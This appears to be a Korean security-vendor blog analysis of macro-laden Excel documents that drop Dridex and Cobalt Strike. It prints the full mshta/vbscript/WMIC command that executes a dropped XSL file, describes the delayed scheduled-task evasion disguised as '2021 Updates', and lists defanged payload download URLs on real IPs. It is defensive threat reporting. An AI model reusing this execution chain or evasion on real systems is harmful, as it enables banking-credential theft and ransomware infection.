더욱 정교해진 Excel 문서 (Dridex, Cobalt Strike 유포)
엑셀 문서를 통해 Dridex 가 유포되는 방식은 작년부터 꾸준히 확인되었으며 ASEC 블로그에도 게시되었다. 최근 ASEC 분석팀은 기존과 비슷한 방식으로 Dridex 와 함께 Cobalt Strike 툴이 함께 유포되는 정황을 포착하였다. 최근 유포되는 엑셀 문서에는 기존과 달리 작업 스케줄러를 이용하여 특정 시간 이후 악성 행위를 수행하는 것으로 확인되었다. 이러한 동작방식의 변화는 샌드박스 환경에서의 탐지 및 행위탐지를 우회하기 위한 시도로 추정된다. 또한, Dridex, Cobalt Strike 악성코드는 과거 도플페이머(DopplePaymer) 랜섬웨어, CLOP 랜섬웨어 감염으로 이어진 피해 사례가 있음으로 기업 사용자 환경의 경우 더욱 주의가 요구된다.
악성 엑셀 문서를 실행시, 아래와 같이 매크로 실행을 유도하는 이미지가 포함되어 있다.
악성 엑셀 문서 실행화면 (1)
악성 엑셀 문서 실행화면 (2)
매크로에 Workbook_Open() 함수가 포함되어 있어 콘텐츠 사용 버튼을 클릭시 자동으로 악성 매크로가 실행되게 된다. 악성 매크로가 실행되면 메시지 박스를 생성 후 악성 행위를 수행한다.
Sheet1 의 특정 영역에 존재하는 데이터를 조합하여 악성 데이터를 생성하며, 조합에 사용되는 데이터는 사용자가 알아차리기 어렵도록 여러 곳에 분산된 형태로 존재한다. 또한 10진수로 저장되어 있어 문자 형태로 변형되어 조합된다. 생성되는 악성 데이터는 드롭되는 파일의 내부 데이터와 드롭된 파일을 실행하는 명령어로 나뉜다.
악성 데이터 조합
분산되어 있는 악성 데이터
이후 생성된 악성 명령어를 작업 스케줄러에 등록하게 된다. 등록된 작업은 매크로가 시작된 시각에서 특정 시간이 지난 후 동작하도록 설정되어 사용자가 악성 행위를 알아차리기 어렵도록 하였다. 특정 시간은 파일마다 조금씩 다른 것으로 확인되었으며 아래 매크로에서는 120초로 설정되는 것을 볼 수 있다.
작업 시작 시간 설정
또한 작업 스케줄러는 “2021 Updates” 명으로 등록되어 정상 작업으로 위장하고 있는 것을 확인할 수 있다.
작업 스케줄러 등록
정상 작업으로 위장한 악성 스케줄러
작업 스케줄러 등록 후 %ALLUSERSPROFILE% 경로에 xsl 파일을 생성하며 매크로가 종료된다. 120초가 지난 후 등록된 작업이 동작하게 되면 아래의 악성 명령어를 실행한다. 해당 명령어는 mshta 를 통해 vbscript 명령어를 실행하게 되며, vbscript 명령어는 WMIC 를 통해 생성된 xsl 파일을 실행하는 기능을 수행한다.
- 악성 명령어
mshta vbscript:Execute(“set osh = CreateObject(“”Wscript.Shell””):osh.Run(“”wmic os get /format:”” & Chr(34) & osh.ExpandEnvironmentStrings(“”%ALLUSERSPROFILE%””) & “”\\qRTF.xsl”” & Chr(34)),0:close”)
xsl 파일 내부에는 악성 자바스크립트가 존재하며, 아래와 같이 다운로드 url 을 포함하고 있다. xsl 파일 실행시 내부에 존재하는 url 에 접속하여 추가 파일 다운로드를 시도하며, 다운로드된 파일은 %TEMP% 경로에 [랜덤5글자].exe (또는 dll) 로 저장되어 실행된다.
- 다운로드 url
hxxp://45.153.241.113:80/download/pload.exe
hxxp://23.227.203.229:80/download/klinch.exe
hxxp://37.120.222.56:80/download/zlnch.exe
hxxp://212.114.52.129:80/download/flnam.dll
hxxp://5.39.222.102:80/download/pdllod.dll
hxxp://145.249.106.39:80/download/cxas.dll
hxxp://37.120.239.185:80/download/dllmar.dll
생성된 xsl 파일의 일부 코드 (1)
생성된 xsl 파일의 일부 코드 (2)
현재까지 다운로드 되는 파일은 Dridex 와 Cobalt Strike 툴이 확인되었다. Dridex 는 뱅킹 악성코드로 뱅킹 관련 사용자 정보 수집 및 공격자의 명령을 받아 악성 행위를 수행하는 기능을 포함하고 있다. 또한 로더를 거쳐 메인 모듈을 다운로드 받아 악성 행위를 수행한다. Cobalt Strike 툴은 보안 취약점을 점검하기 위한 목적으로 사용 가능한 침투 테스트 도구이지만, 크랙 버전이 공개됨에 따라 다양한 공격자에 의해 악성코드로 사용되어 추가 악성파일을 다운로드 받을 수 있다.
[파일 진단]
- Downloader/XLS.Generic.S1585
- Downloader/XLS.Generic
- Downloader/XSL.Generic
- Trojan/Win.CobaltStrike.R429897
- Trojan/Win.Dridex.C4544306
[기존 엑셀로 유포된 Dridex 관련 블로그]
Dridex 악성코드 다운로드 방식(WMIC 이용 XSL 실행) – ASEC BLOG
지난 6월 ASEC 분석팀은 금융 정보 탈취형 악성코드로 알려진 Dridex의 새로운 유포 방식을 확인하였다. 이번에 확인된 유포 방식([그림 1])은 악성 매크로가 담긴 문서 파일 실행을 시작으로 정상 윈도우 유틸리티(WMIC.exe)을 활용하여 악성 XSL(Extensible Stylesheet Language) 문서 스크립트 파일을 실행하는 방식이다. 결과적으로 감염 PC에는 실행된 XSL 포맷 파일에 의해 Dridex가 실행된다. ※ XSL 포맷은 XML 형식으로 javascript, vbscript 등의 스크립팅을 지원하는…
탐지 우회 방법으로 무장한 Dridex 악성코드 유포방식 분석 – ASEC BLOG
Dridex (또는 Cridex, Bugat)는 대표적인 금융 정보 유출형 악성코드이다. 사이버범죄 조직에 의해 글로벌로 대규모로 유포되고 있으며, 주로 스팸메일에 포함된 Microsoft Office Word나 Excel 문서 파일의 매크로를 이용한다. Dridex 악성코드의 가장 큰 특징으로는 다운로더, 로더, 봇넷 등 기능에 따라 파일을 모듈화하여 동작한다는 점이다. 이로 인해 Dridex 악성코드를 이용하여 DoppelPaymer 나 BitPaymer와 같은 랜섬웨어가 유포된 이력도 확인되었다. Dridex 악성코드를 제작 …
